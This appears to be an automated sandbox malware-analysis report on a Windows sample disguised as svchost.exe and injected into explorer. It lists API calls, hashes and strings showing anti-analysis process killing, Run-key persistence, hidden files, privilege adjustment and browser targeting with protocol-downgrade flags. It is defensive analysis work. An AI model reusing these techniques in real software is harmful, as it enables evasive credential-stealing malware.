                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2574300362-0
                                                                                                                                                                                                                          • Opcode ID: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                                          • Instruction ID: 797435ddb680424ebbc96c2ef9b9917cb678864f7979cf6a571397b3ccc79694
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DBE09276508F8486CA60AB15F85011EB7B4FBC8B94F944526EACD82B28DF3CC165CB00

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 419 7ff7e52b3b24-7ff7e52b3b33 420 7ff7e52b3b35-7ff7e52b3b42 VirtualFree 419->420 421 7ff7e52b3b48-7ff7e52b3b4c 419->421 420->421
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                          • Opcode ID: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                                                                          • Instruction ID: 5b047fbe46b6ce5d9f51d02e9ba33a8e1ff88cf3c86a7bcb6f101778fef8bbcb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7FD01261E3894581EBD5AB26EC99719E3A4FBD8F44FC4C036E68A81568CF3CD0998F11
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleName
                                                                                                                                                                                                                          • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                          • API String ID: 514040917-3001742581
                                                                                                                                                                                                                          • Opcode ID: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                                                                          • Instruction ID: af8e1d7dd572e00a3e9885ed2d59cf6c6c00ae16a050c4d2f9aca983e9266a1d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9432FA7261CBC586EBB5DB15E8647AAB3A5FBC8B40F804136DA8D83B58DF3CD4448B11
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF7E52B1D19
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                                          • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                          • API String ID: 2307068205-2771526726
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B45C4: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3117), ref: 00007FF7E52B460C
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B45C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3117), ref: 00007FF7E52B4649
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B45C4: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3117), ref: 00007FF7E52B4654
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3B84: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B311C), ref: 00007FF7E52B3BC7
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3B84: RegSetValueExW.ADVAPI32 ref: 00007FF7E52B3BFD
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3B84: RegCloseKey.ADVAPI32 ref: 00007FF7E52B3C0C
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3C24: RegDeleteKeyW.ADVAPI32 ref: 00007FF7E52B3C3C
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3E24: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7E52B3E37
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3E24: Process32FirstW.KERNEL32 ref: 00007FF7E52B3E6A
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3E24: CloseHandle.KERNEL32 ref: 00007FF7E52B3E7C
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3E24: wcscmp.MSVCRT ref: 00007FF7E52B3E91
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3E24: OpenProcess.KERNEL32 ref: 00007FF7E52B3EA7
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3E24: TerminateProcess.KERNEL32 ref: 00007FF7E52B3ECA
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3E24: CloseHandle.KERNEL32 ref: 00007FF7E52B3ED8
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3E24: Process32NextW.KERNEL32 ref: 00007FF7E52B3EEB
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3E24: CloseHandle.KERNEL32 ref: 00007FF7E52B3EFD
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B39B4: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF7E52B3B0C), ref: 00007FF7E52B39E4
                                                                                                                                                                                                                          • Sleep.KERNEL32 ref: 00007FF7E52B31C6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                                          • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                          • API String ID: 2853470409-928700279
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                          • String ID: rbNSpGEsyb
                                                                                                                                                                                                                          • API String ID: 299056699-189039185
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1083639309-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 299056699-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                          • String ID: Unknown
                                                                                                                                                                                                                          • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                          • Opcode ID: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                                                                          • Instruction ID: a0e41d55a6a38c7a220cbc19af8769bd302f0d948737d3e432776235a3dd0fca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA31D97261CAC585DBB0EB19E8987AAB3A4F798B40F404136DA8DC3B68DF3DD154CB11
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7E52B3784
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3744: GetVolumeInformationW.KERNELBASE ref: 00007FF7E52B3801
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B3744: wsprintfW.USER32 ref: 00007FF7E52B38A2
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B390D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3922
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3935
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3945
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3958
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B396D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3980
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3995
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32 ref: 00007FF7E52B3AB9
                                                                                                                                                                                                                          • DeleteFileW.KERNEL32 ref: 00007FF7E52B3AC4
                                                                                                                                                                                                                          • CopyFileW.KERNEL32 ref: 00007FF7E52B3ADD
                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32 ref: 00007FF7E52B3AF5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: Services
                                                                                                                                                                                                                          • API String ID: 3209240227-2319745855
                                                                                                                                                                                                                          • Opcode ID: 311e9769a5f9042a1c4d1274615ef5c6319402c3cf93bf79ed3cbc3423f0458e
                                                                                                                                                                                                                          • Instruction ID: 74b461e13fc68567b4c63897fbb98cac2732082def9488eff697fb992837867f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 311e9769a5f9042a1c4d1274615ef5c6319402c3cf93bf79ed3cbc3423f0458e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B0188A1A1858652DFA0EB24EC643AA9364FB98B44FD04033D24DC35A8EE3CD249CB11
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                                                                                                          • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                                          • API String ID: 779948276-85274793
                                                                                                                                                                                                                          • Opcode ID: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                                                                          • Instruction ID: 6564cf23917d6a87b606184b7296d09634800162ee19dcede5aa38be54c2d556
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5014C76618A808ADB909F14F85471AB778F788B94F901226EB8D83B68DF7CC144CF11
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                          • API String ID: 779948276-1428018034
                                                                                                                                                                                                                          • Opcode ID: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                                                                          • Instruction ID: 6c6fa1464ff4f5b2fc11fb66302106246aadef941fdf2229d2bd956d9c47cad2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9116672528B4486DB909B14F85072AB7A4FB88BA0F505331F96E83BE8DF7CD144CB11
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B390D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3922
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3935
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3945
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3958
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B396D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3980
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E52B3AA9), ref: 00007FF7E52B3995
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B46E4: CreateFileW.KERNELBASE ref: 00007FF7E52B472B
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B40E4: GetCurrentProcess.KERNEL32 ref: 00007FF7E52B414B
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B40E4: OpenProcessToken.ADVAPI32 ref: 00007FF7E52B415E
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B40E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7E52B4186
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B40E4: AdjustTokenPrivileges.KERNELBASE ref: 00007FF7E52B41B1
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B40E4: CloseHandle.KERNEL32 ref: 00007FF7E52B41BC
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B40E4: OpenProcess.KERNEL32 ref: 00007FF7E52B41D1
                                                                                                                                                                                                                            • Part of subcall function 00007FF7E52B40E4: CloseHandle.KERNEL32 ref: 00007FF7E52B4249
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 00007FF7E52B3037
                                                                                                                                                                                                                          • HeapFree.KERNEL32 ref: 00007FF7E52B304A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.3292014635.00007FF7E52B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7E52B0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3291962081.00007FF7E52B0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292072555.00007FF7E52B5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292137989.00007FF7E52B7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292204839.00007FF7E52B8000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000006.00000002.3292261874.00007FF7E52BA000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff7e52b0000_svchost.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$Process$CloseCreateFileHandleHeapOpenToken$AdjustAttributesCurrentDirectoryFolderFreeLookupPathPrivilegePrivilegesValue
                                                                                                                                                                                                                          • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                                          • API String ID: 3992431006-2286007224
                                                                                                                                                                                                                          • Opcode ID: 66002f7cc1a048e7c990725712f415c121466e6a21f61a925546d1bd52d36aeb
                                                                                                                                                                                                                          • Instruction ID: 651a06c44d721a237996f569c9899331d2e0da680c1933684e6e31ab98354fb5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66002f7cc1a048e7c990725712f415c121466e6a21f61a925546d1bd52d36aeb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41110DA0918A8A85EB90FB10EC643A5B7A8FB8CB04F844136D58CD3665DF3CE0458762

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:2.4%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                          Signature Coverage:10.6%
                                                                                                                                                                                                                          Total number of Nodes:395
                                                                                                                                                                                                                          Total number of Limit Nodes:17

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$ByteCharMultiWide
                                                                                                                                                                                                                          • API String ID: 2683923594-1492645186
                                                                                                                                                                                                                          • Opcode ID: 8d59903077919d75a48de8f6b3917833d6ddf00dddff58a82a888e902bab9895
                                                                                                                                                                                                                          • Instruction ID: ce43aa0fe60964610626e0678969479dfc616cd6aab3af5d6e2fd2311c197f12
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d59903077919d75a48de8f6b3917833d6ddf00dddff58a82a888e902bab9895
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED032838602FC1D9EA818B52FC9839573A9B749B91F509A76C88D63736EF39C198C740

                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$lstrcmpi$Write$Pathfree$_errnolstrcat$CreateFindHeapNamelstrlen$AllocByteCharCloseErrorExistsFolderFreeHandleLastMultiProcessTerminateThreadWide_callnewhlstrcpymallocwsprintf
                                                                                                                                                                                                                          • String ID: --disable-http2 --use-spdy=off --disable-quic$AVGBrowser.exe$AvastBrowser.exe$B8IH$Diamotrixed$\\.\pipe\%s$brave.exe$browser.exe$chrome.exe$firefox.exe$msedge.exe$opera.exe$taskmgr.exe$trusteer
                                                                                                                                                                                                                          • API String ID: 3240663557-3061648580
                                                                                                                                                                                                                          • Opcode ID: 99ad222673ba694320bb615da2a5c6662173702eac1b7259930a67c36a373a93
                                                                                                                                                                                                                          • Instruction ID: 1afe5b82a86e3de362014699e2e991023637a5a550e89fe2220e1ecbb6841d92
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99ad222673ba694320bb615da2a5c6662173702eac1b7259930a67c36a373a93
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65C19232205B8586EB10DF66EC643A973A1F789B88F404925DE4E5BB68DF7CC549CB40

                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
